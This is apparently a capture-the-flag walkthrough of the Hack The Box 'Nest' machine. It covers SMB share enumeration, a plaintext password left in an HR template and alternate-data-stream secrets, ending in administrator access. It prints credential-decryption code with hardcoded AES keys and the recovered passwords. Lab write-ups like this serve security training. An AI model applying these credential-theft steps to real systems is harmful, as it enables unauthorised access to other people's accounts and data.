Hello readers! Here is my write up for this box:
1. Nmap scan
Looking at the nmap scan, we can see two ports that are open: 445 (SMB) and 4386 (mystery service).
root@kali:~/htb/nest# nmap -sC -sV -p- -O -oA nmap\_out1 10.10.10.178 Nmap scan report for 10.10.10.178 Host is up (0.037s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory\_Name> | RUNQUERY <Query\_ID> | DEBUG <Password> |\_ HELP <Command> --- SNIP --- Host script results: |\_clock-skew: 1m54s | smb2-security-mode: | 2.02: |\_ Message signing enabled but not required | smb2-time: | date: 2020-05-29T04:33:04 |\_ start\_date: 2020-05-29T04:24:52 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 318.91 seconds 2. SMB enumeration
Since port 445 is open, let see what smb drives are there. Running smbclient gave me this:
root@kali:~/htb/nest# smbclient -L 10.10.10.178 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk Reconnecting with SMB1 for workgroup listing. do\_connect: Connection to 10.10.10.178 failed (Error NT\_STATUS\_IO\_TIMEOUT) Unable to connect with SMB1 -- no workgroup available We can see that apart from the common drives, there are three additional drives: Data , Secure$ and Users. Let’s see what can we access as an unauthenticated user:
For the Users drive:
root@kali:~# smbclient \\\\10.10.10.178\\Users Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jan 25 18:04:21 2020 .. D 0 Sat Jan 25 18:04:21 2020 Administrator D 0 Fri Aug 9 11:08:23 2019 C.Smith D 0 Sun Jan 26 02:21:44 2020 L.Frost D 0 Thu Aug 8 13:03:01 2019 R.Thompson D 0 Thu Aug 8 13:02:50 2019 TempUser D 0 Wed Aug 7 18:55:56 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \> cd ./TempUser\ smb: \TempUser\> ls NT\_STATUS\_ACCESS\_DENIED listing \TempUser\* smb: \TempUser\> cd .. smb: \> cd ./C.Smith\ smb: \C.Smith\> ls NT\_STATUS\_ACCESS\_DENIED listing \C.Smith\* smb: \C.Smith\> cd .. smb: \> cd ./Administrator smb: \Administrator\> ls NT\_STATUS\_ACCESS\_DENIED listing \Administrator\* smb: \Administrator\> cd .. smb: \> cd ./L.Frost smb: \L.Frost\> ls NT\_STATUS\_ACCESS\_DENIED listing \L.Frost\* smb: \L.Frost\> cd .. smb: \> cd ./R.Thompson smb: \R.Thompson\> ls NT\_STATUS\_ACCESS\_DENIED listing \R.Thompson\* smb: \R.Thompson\> cd .. For the Data drives:
root@kali:~# smbclient \\\\10.10.10.178\\Data Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Aug 7 18:53:46 2019 .. D 0 Wed Aug 7 18:53:46 2019 IT D 0 Wed Aug 7 18:58:07 2019 Production D 0 Mon Aug 5 17:53:38 2019 Reports D 0 Mon Aug 5 17:53:44 2019 Shared D 0 Wed Aug 7 15:07:51 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \> cd ./IT smb: \IT\> ls NT\_STATUS\_ACCESS\_DENIED listing \IT\* smb: \IT\> cd .. smb: \> cd ./Production smb: \Production\> ls NT\_STATUS\_ACCESS\_DENIED listing \Production\* smb: \Production\> cd .. smb: \> cd ./Reports\ smb: \Reports\> ls NT\_STATUS\_ACCESS\_DENIED listing \Reports\* smb: \Reports\> cd .. smb: \> cd ./Shared\ smb: \Shared\> ls . D 0 Wed Aug 7 15:07:51 2019 .. D 0 Wed Aug 7 15:07:51 2019 Maintenance D 0 Wed Aug 7 15:07:32 2019 Templates D 0 Wed Aug 7 15:08:07 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \Shared\> cd Maintenance\ smb: \Shared\Maintenance\> ls . D 0 Wed Aug 7 15:07:32 2019 .. D 0 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt A 48 Mon Aug 5 19:01:44 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \Shared\Maintenance\> cd .. smb: \Shared\> cd ./Templates\ smb: \Shared\Templates\> ls . D 0 Wed Aug 7 15:08:07 2019 .. D 0 Wed Aug 7 15:08:07 2019 HR D 0 Wed Aug 7 15:08:01 2019 Marketing D 0 Wed Aug 7 15:08:06 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \Shared\Templates\> cd ./HR\ smb: \Shared\Templates\HR\> ls . D 0 Wed Aug 7 15:08:01 2019 .. D 0 Wed Aug 7 15:08:01 2019 Welcome Email.txt A 425 Wed Aug 7 18:55:36 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \Shared\Templates\HR\> cd .. smb: \Shared\Templates\> cd ./Marketing\ smb: \Shared\Templates\Marketing\> ls . D 0 Wed Aug 7 15:08:06 2019 .. D 0 Wed Aug 7 15:08:06 2019 10485247 blocks of size 4096. 6543448 blocks available For the Secure$ Drive:
root@kali:~# smbclient \\\\10.10.10.178\\Secure$ Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls NT\_STATUS\_ACCESS\_DENIED listing \* smb: \> So base on the above results, it seems like the only folders we are able to view is the Shared folder on the Data drive. Viewing the contents, we get the following:
root@kali:~/htb/nest# cat Maintenance\ Alerts.txt There is currently no scheduled maintenance work root@kali:~/htb/nest# cat ./Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you HR And we get our first user credentials! The next obvious place to look at is the TempUser folder on the Users drive.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Users -U TempUser%welcome2019 Domain=[HTB-NEST] OS=[] Server=[] Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jan 25 18:04:21 2020 .. D 0 Sat Jan 25 18:04:21 2020 Administrator D 0 Fri Aug 9 11:08:23 2019 C.Smith D 0 Sun Jan 26 02:21:44 2020 L.Frost D 0 Thu Aug 8 13:03:01 2019 R.Thompson D 0 Thu Aug 8 13:02:50 2019 TempUser D 0 Wed Aug 7 18:55:56 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \> cd ./TempUser\ smb: \TempUser\> ls . D 0 Wed Aug 7 18:55:56 2019 .. D 0 Wed Aug 7 18:55:56 2019 New Text Document.txt A 0 Wed Aug 7 18:55:56 2019 10485247 blocks of size 4096. 6543448 blocks available root@kali:~/htb/nest# cat "New Text Document.txt" ---- Nothing :( -------- Listing out the contents of this folder gives us a text document that contains nothing on it. We still aren’t able to access any other folders, so lets move on to the Data drive.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Data -U TempUser%welcome2019 Domain=[HTB-NEST] OS=[] Server=[] Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Aug 7 18:53:46 2019 .. D 0 Wed Aug 7 18:53:46 2019 IT D 0 Wed Aug 7 18:58:07 2019 Production D 0 Mon Aug 5 17:53:38 2019 Reports D 0 Mon Aug 5 17:53:44 2019 Shared D 0 Wed Aug 7 15:07:51 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \> cd ./IT smb: \IT\> ls . D 0 Wed Aug 7 18:58:07 2019 .. D 0 Wed Aug 7 18:58:07 2019 Archive D 0 Mon Aug 5 18:33:58 2019 Configs D 0 Wed Aug 7 18:59:34 2019 Installs D 0 Wed Aug 7 18:08:30 2019 Reports D 0 Sat Jan 25 19:09:13 2020 Tools D 0 Mon Aug 5 18:33:43 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \IT\> cd ./Archive\ smb: \IT\Archive\> ls . D 0 Mon Aug 5 18:33:58 2019 .. D 0 Mon Aug 5 18:33:58 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \IT\Archive\> cd .. smb: \IT\> cd ./Configs\ smb: \IT\Configs\> ls . D 0 Wed Aug 7 18:59:34 2019 .. D 0 Wed Aug 7 18:59:34 2019 Adobe D 0 Wed Aug 7 15:20:09 2019 Atlas D 0 Tue Aug 6 07:16:18 2019 DLink D 0 Tue Aug 6 09:25:27 2019 Microsoft D 0 Wed Aug 7 15:23:26 2019 NotepadPlusPlus D 0 Wed Aug 7 15:31:37 2019 RU Scanner D 0 Wed Aug 7 16:01:13 2019 Server Manager D 0 Tue Aug 6 09:25:19 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \IT\Configs\> cd ./RU Scanner\ cd \IT\Configs\RU\: NT\_STATUS\_OBJECT\_NAME\_NOT\_FOUND smb: \IT\Configs\> ls . D 0 Wed Aug 7 18:59:34 2019 .. D 0 Wed Aug 7 18:59:34 2019 Adobe D 0 Wed Aug 7 15:20:09 2019 Atlas D 0 Tue Aug 6 07:16:18 2019 DLink D 0 Tue Aug 6 09:25:27 2019 Microsoft D 0 Wed Aug 7 15:23:26 2019 NotepadPlusPlus D 0 Wed Aug 7 15:31:37 2019 RU Scanner D 0 Wed Aug 7 16:01:13 2019 Server Manager D 0 Tue Aug 6 09:25:19 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \IT\Configs\> cd "RU Scanner" smb: \IT\Configs\RU Scanner\> ls . D 0 Wed Aug 7 16:01:13 2019 .. D 0 Wed Aug 7 16:01:13 2019 RU\_config.xml A 270 Thu Aug 8 15:49:37 2019 10485247 blocks of size 4096. 6543448 blocks available smb: \IT\Configs\RU Scanner\> cd .. smb: \IT\Configs\> cd ./NotepadPlusPlus smb: \IT\Configs\NotepadPlusPlus\> ls . D 0 Wed Aug 7 15:31:37 2019 .. D 0 Wed Aug 7 15:31:37 2019 config.xml A 6451 Wed Aug 7 19:01:25 2019 shortcuts.xml A 2108 Wed Aug 7 15:30:27 2019 10485247 blocks of size 4096. 6543448 blocks available We can see that we are now able to list out the contents now. I won’t list out the whole enumeration of all directories, in order to keep some brevity. Both the Production and Reports folder contain nothing important in them. The most interesting files are listed below: RU_config.xml and config.xml.
root@kali:~/htb/nest# cat RU\_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>c.smith</Username> <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password> root@kali:~/htb/nest# cat config.xml <?xml version="1.0" encoding="Windows-1252" ?> <NotepadPlus> <GUIConfigs> ---- SNIP </FindHistory> <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> </NotepadPlus> We can see in the first file another set of credentials, but the password seems to be hashed. The second file contains what appears to be a configuration file for Notepad++. The majority of the content is noise, except for the very bottom part. One of the filepaths seems to be related to the Secure$ drive.
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> With that information at hand, lets see if we are able to access Secure$ drive now.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Secure$ -U TempUser%welcome2019 Domain=[HTB-NEST] OS=[] Server=[] Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Aug 7 19:08:12 2019 .. D 0 Wed Aug 7 19:08:12 2019 Finance D 0 Wed Aug 7 15:40:13 2019 HR D 0 Wed Aug 7 19:08:11 2019 IT D 0 Thu Aug 8 06:59:25 2019 10485247 blocks of size 4096. 6543183 blocks available smb: \> cd ./Finance\ smb: \Finance\> ls NT\_STATUS\_ACCESS\_DENIED listing \Finance\* smb: \Finance\> cd .. smb: \> cd ./HR smb: \HR\> ls NT\_STATUS\_ACCESS\_DENIED listing \HR\* smb: \HR\> cd .. smb: \> cd ./IT smb: \IT\> ls NT\_STATUS\_ACCESS\_DENIED listing \IT\* smb: \IT\> cd ./Carl smb: \IT\Carl\> ls . D 0 Wed Aug 7 15:42:14 2019 .. D 0 Wed Aug 7 15:42:14 2019 Docs D 0 Wed Aug 7 15:44:00 2019 Reports D 0 Tue Aug 6 09:45:40 2019 VB Projects D 0 Tue Aug 6 10:41:55 2019 10485247 blocks of size 4096. 6543183 blocks available With the TempUser credentials, we are now able to directory list the drive but we still cannot see what the contents are in each folder. However if we change directories to /IT/Carl , we are suddenly able to directory list again.
smb: \IT\Carl\> cd ./Docs smb: \IT\Carl\Docs\> ls . D 0 Wed Aug 7 15:44:00 2019 .. D 0 Wed Aug 7 15:44:00 2019 ip.txt A 56 Wed Aug 7 15:44:16 2019 mmc.txt A 73 Wed Aug 7 15:43:42 2019 10485247 blocks of size 4096. 6543183 blocks available smb: \IT\Carl\Docs\> cd .. smb: \IT\Carl\> cd ./Reports\ smb: \IT\Carl\Reports\> ls . D 0 Tue Aug 6 09:45:40 2019 .. D 0 Tue Aug 6 09:45:40 2019 10485247 blocks of size 4096. 6543183 blocks available smb: \IT\Carl\Reports\> cd .. smb: \IT\Carl\> cd ./"VB Projects\" smb: \IT\Carl\VB Projects\> ls . D 0 Tue Aug 6 10:41:55 2019 .. D 0 Tue Aug 6 10:41:55 2019 Production D 0 Tue Aug 6 10:07:13 2019 WIP D 0 Tue Aug 6 10:47:41 2019 10485247 blocks of size 4096. 6543183 blocks available For brevity sake, I won’t display the contents of the files in Docs and Reports as they are irrelevant. The folder VB Projects on the other hand, contains files for a VB application — located in the WIP folder (The Production folder doesn’t have anything inside).
smb: \IT\Carl\VB Projects\> cd ./WIP\ smb: \IT\Carl\VB Projects\WIP\> ls . D 0 Tue Aug 6 10:47:41 2019 .. D 0 Tue Aug 6 10:47:41 2019 RU D 0 Fri Aug 9 11:36:45 2019 10485247 blocks of size 4096. 6543183 blocks available smb: \IT\Carl\VB Projects\WIP\> cd ./RU smb: \IT\Carl\VB Projects\WIP\RU\> ls . D 0 Fri Aug 9 11:36:45 2019 .. D 0 Fri Aug 9 11:36:45 2019 RUScanner D 0 Wed Aug 7 18:05:54 2019 RUScanner.sln A 871 Tue Aug 6 10:45:36 2019 10485247 blocks of size 4096. 6543183 blocks available smb: \IT\Carl\VB Projects\WIP\RU\> cd ./RUScanner smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls . D 0 Wed Aug 7 18:05:54 2019 .. D 0 Wed Aug 7 18:05:54 2019 bin D 0 Wed Aug 7 16:00:11 2019 ConfigFile.vb A 772 Wed Aug 7 18:05:09 2019 Module1.vb A 279 Wed Aug 7 18:05:44 2019 My Project D 0 Wed Aug 7 16:00:11 2019 obj D 0 Wed Aug 7 16:00:11 2019 RU Scanner.vbproj A 4828 Fri Aug 9 11:37:51 2019 RU Scanner.vbproj.user A 143 Tue Aug 6 08:55:27 2019 SsoIntegration.vb A 133 Wed Aug 7 18:05:58 2019 Utils.vb A 4888 Wed Aug 7 15:49:35 2019 10485247 blocks of size 4096. 6543183 blocks available If we go back to the RU_config.xml file we found in the Data drive, we would realize that it was located under the RU Scanner folder — which means these files are the key to decrypting the password. Since this is a VB Application, the best way to go about this is to use Visual Studio on Windows. It will make viewing and building the code a whole lot easier. Simply import the project by opening the RUScanner.sln file. The three most important files are the following: Module1.vb, Ssointegration.vb and Utils.vb.
Module Module1 Sub Main() Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU\_Config.xml") Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)} End Sub End Module Module1.vb shows how the RU_Config.xml file is imported.
Public Class SsoIntegration Public Property Username As String Public Property Password As String End Class Ssointegration.vb shows how the credentials are being stored in memory.
--- SNIP --- Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function --- SNIP --- Utils.vb shows the actual encryption and decryption method being used. In order to get the program to displayed the decrypted password, we need to first build the program and debug it afterwards. Once we build it, we placed the RU_Config.xml file inside the same folder as the build, enter debug mode, and set a breakpoint. Since Utils.vb file is where the decryption lies, we need to examine at what point of the code is the password decrypted. Here are the functions that does just that:
Public Shared Function Decrypt(ByVal cipherText As String, \_ ByVal passPhrase As String, \_ ByVal saltValue As String, \_ ByVal passwordIterations As Integer, \_ ByVal initVector As String, \_ ByVal keySize As Integer) \_ As String Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue) Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText) Dim password As New Rfc2898DeriveBytes(passPhrase, \_ saltValueBytes, \_ passwordIterations) Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes) Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes) Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, \_ decryptor, \_ CryptoStreamMode.Read) Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length) Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, \_ 0, \_ plainTextBytes.Length) memoryStream.Close() cryptoStream.Close() Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, \_ 0, \_ decryptedByteCount) INSERT BREAKPOINT HERE ---> Console.WriteLine(plainText) Return plainText End Function I added the code Console.WriteLine(plainText) to make it easier for me to setup a breakpoint. Once we set all that up, the program will run and stop at the breakpoint. We should be able to see the value of plainText at the debugging menu.
The password decrypted to: “xRxRxPANCAK3SxRxRx”.
We can then try logging into the smb drives using the newly acquired credentials for the user: C.Smith or Carl. In this case, only the User drive is relevant, as the directory listing on other drives yield essentially nothing.
root@kali:~/htb/nest# smbclient \\\\10.10.10.178\\Users -U C.Smith%xRxRxPANCAK3SxRxRx Domain=[HTB-NEST] OS=[] Server=[] Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jan 25 18:04:21 2020 .. D 0 Sat Jan 25 18:04:21 2020 Administrator D 0 Fri Aug 9 11:08:23 2019 C.Smith D 0 Sun Jan 26 02:21:44 2020 L.Frost D 0 Thu Aug 8 13:03:01 2019 R.Thompson D 0 Thu Aug 8 13:02:50 2019 TempUser D 0 Wed Aug 7 18:55:56 2019 10485247 blocks of size 4096. 6545473 blocks available smb: \> cd ./C.Smith smb: \C.Smith\> ls . D 0 Sun Jan 26 02:21:44 2020 .. D 0 Sun Jan 26 02:21:44 2020 HQK Reporting D 0 Thu Aug 8 19:06:17 2019 user.txt A 32 Thu Aug 8 19:05:24 2019 10485247 blocks of size 4096. 6545473 blocks available smb: \C.Smith\> ls . D 0 Sun Jan 26 02:21:44 2020 .. D 0 Sun Jan 26 02:21:44 2020 HQK Reporting D 0 Thu Aug 8 19:06:17 2019 user.txt A 32 Thu Aug 8 19:05:24 2019 10485247 blocks of size 4096. 6545473 blocks available smb: \C.Smith\> cd "HQK Reporting" smb: \C.Smith\HQK Reporting\> ls . D 0 Thu Aug 8 19:06:17 2019 .. D 0 Thu Aug 8 19:06:17 2019 AD Integration Module D 0 Fri Aug 9 08:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019 HQK\_Config\_Backup.xml A 249 Thu Aug 8 19:09:05 2019 smb: \C.Smith\HQK Reporting\AD Integration Module\> ls . D 0 Fri Aug 9 08:18:42 2019 .. D 0 Fri Aug 9 08:18:42 2019 HqkLdap.exe A 17408 Wed Aug 7 19:41:16 2019 10485247 blocks of size 4096. 6545457 blocks available smb: \C.Smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (95.0 KiloBytes/sec) (average 17.6 KiloBytes/sec) smb: \C.Smith\HQK Reporting\AD Integration Module\> cd .. smb: \C.Smith\HQK Reporting\> ls . D 0 Thu Aug 8 19:06:17 2019 .. D 0 Thu Aug 8 19:06:17 2019 AD Integration Module D 0 Fri Aug 9 08:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019 HQK\_Config\_Backup.xml A 249 Thu Aug 8 19:09:05 2019 At this point we can grab the user flag and submit it to HackTheBox.
The directory listing yield some interesting files: an exe file, config file and an empty file. Lets look at the config file:
root@kali:~/htb/nest/HQK# cat HQK\_Config\_Backup.xml <?xml version="1.0"?> <ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>4386</Port> <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory> </ServiceSettings> We can see that the exe seems to run on port 4386 on the machine. If we look back on our nmap scans, we can see that the machine does have port 4386 running — with HQK service running so that’s probably it. To access the service we can telnet to the port with telnet 10.10.10.178 4386. Upon using telnet we are greeted with this:
root@kali:~/htb/nest# telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory\_Name> RUNQUERY <Query\_ID> DEBUG <Password> HELP <Command> Looks like some kind of service to run queries. We can freely change directories with the setdir command and list out contents of the directory with list. runquery doesn't seem to run properly - even with "legitimate" files. Then there's the debug command which seems to give additional functionality to the service - that is if you have a password.
>list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] COMPARISONS [1] Invoices (Ordered By Customer) [2] Products Sold (Ordered By Customer) [3] Products Sold In Last 30 Days Current Directory: ALL QUERIES >runquery 1 Invalid database configuration found. Please contact your system administrator >help debug DEBUG <Password> Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed Examples: DEBUG MyPassw0rd Attempts to enable debug mode by using the password "MyPassw0rd" If we go back to the password file we found with the exe it looks like an empty file, however that’s not entirely true. Lets go back to the file on the smb drive and view again:
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create\_time: Thu Aug 8 07:06:12 PM 2019 EDT access\_time: Thu Aug 8 07:06:12 PM 2019 EDT write\_time: Thu Aug 8 07:08:17 PM 2019 EDT change\_time: Thu Aug 8 07:08:17 PM 2019 EDT attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes We can see now that the password was simply hidden on a different data stream , hence the appearance of looking empty. Make sure when you do download the file that you specify the stream, otherwise it will download the file but strip the stream. Like the following:
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$DATA" Once downloaded, we can view the file can see the debug password inside.
root@kali:~/htb/nest# cat Debug\ Mode\ Password.txt\:Password\:\$DATA WBQ201953D8w We entered in the password on the HQK service on port 4386 and we get some additional commands to play with:
root@kali:~/htb/nest# telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >Debug WBQ201953D8w Debug mode enabled. Use the HELP command to view additional commands that are now available >Help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory\_Name> RUNQUERY <Query\_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query\_ID> The most important query is showquery which allows you to view the contents of files. The current folder we are in doesn't have anything interesting so lets move up a folder and view the ldap folder - as that seems like a likely place for credentials.
>setdir .. Current directory set to HQK >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK\_Config.xml Current Directory: HQK >setdir ldap Current directory set to ldap >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap.exe [2] Ldap.conf Current Directory: ldap >showquery 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4= Viewing the file we can see a set of credentials for an administrator including the hashed password. In order to decrypt the password, we will do something similar like we did to get Carl’s password from RU Scanner. In this case, we don’t have the project files but we do have the exe — which means we have to decompile it. Since this is most likely a .Net application, we will use a .Net decompiler. You can use any .Net decomplier, the one I used is called JustDecompile.
As you can see from the left taskbar, there are a few modules — the most important one called HqkLdap. Inside that there are 4 main pages, the CR being the most important. CR contains the code for the encryption and decryption of password hashes. Unlike the RU Scanner application, there’s no need to build the code or to run a debugger. Instead we can just take the entire CR class and run it separately. Since the code only contains the class and not the main function, you need to add that in. Like the following:
using System; using System.IO; using System.Security.Cryptography; using System.Text; using System.Collections.Generic; using System.Collections.ObjectModel; using System.Diagnostics; namespace HqkLdap { public class CR { private const string K = "667912"; private const string I = "1L1SA61493DRV53Z"; private const string SA = "1313Rf99"; public CR() { } public static string DS(string EncryptedString) { if (string.IsNullOrEmpty(EncryptedString)) { return string.Empty; } return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } public static string ES(string PlainString) { if (string.IsNullOrEmpty(PlainString)) { return string.Empty; } return CR.RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256); } private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { byte[] bytes = Encoding.ASCII.GetBytes(initVector); byte[] numArray = Encoding.ASCII.GetBytes(saltValue); byte[] numArray1 = Convert.FromBase64String(cipherText); Rfc2898DeriveBytes rfc2898DeriveByte = new Rfc2898DeriveBytes(passPhrase, numArray, passwordIterations); byte[] bytes1 = rfc2898DeriveByte.GetBytes(checked((int)Math.Round((double)keySize / 8))); AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider() { Mode = CipherMode.CBC }; ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateDecryptor(bytes1, bytes); MemoryStream memoryStream = new MemoryStream(numArray1); CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, CryptoStreamMode.Read); byte[] numArray2 = new byte[checked(checked((int)numArray1.Length) + 1)]; int num = cryptoStream.Read(numArray2, 0, checked((int)numArray2.Length)); memoryStream.Close(); cryptoStream.Close(); return Encoding.ASCII.GetString(numArray2, 0, num); } private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize) { string base64String; byte[] bytes = Encoding.ASCII.GetBytes(initVector); byte[] numArray = Encoding.ASCII.GetBytes(saltValue); byte[] bytes1 = Encoding.ASCII.GetBytes(plainText); Rfc2898DeriveBytes rfc2898DeriveByte = new Rfc2898DeriveBytes(passPhrase, numArray, passwordIterations); byte[] numArray1 = rfc2898DeriveByte.GetBytes(checked((int)Math.Round((double)keySize / 8))); AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider() { Mode = CipherMode.CBC }; ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateEncryptor(numArray1, bytes); using (MemoryStream memoryStream = new MemoryStream()) { using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, CryptoStreamMode.Write)) { cryptoStream.Write(bytes1, 0, checked((int)bytes1.Length)); cryptoStream.FlushFinalBlock(); byte[] array = memoryStream.ToArray(); memoryStream.Close(); cryptoStream.Close(); base64String = Convert.ToBase64String(array); } } return base64String; } ##############################ADDED CODE################################### public static void Main(){ Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")); } ########################################################################### } } The way I went about this was to run it inside an online .Net complier.
We can see from above that once we run the code, it gives us the decrypted password which is: XtH4nkS4Pl4y1nGX. Now that we have the Administrative password, we can now log into the smb drive C as an Administrative user and grab the root.txt flag.
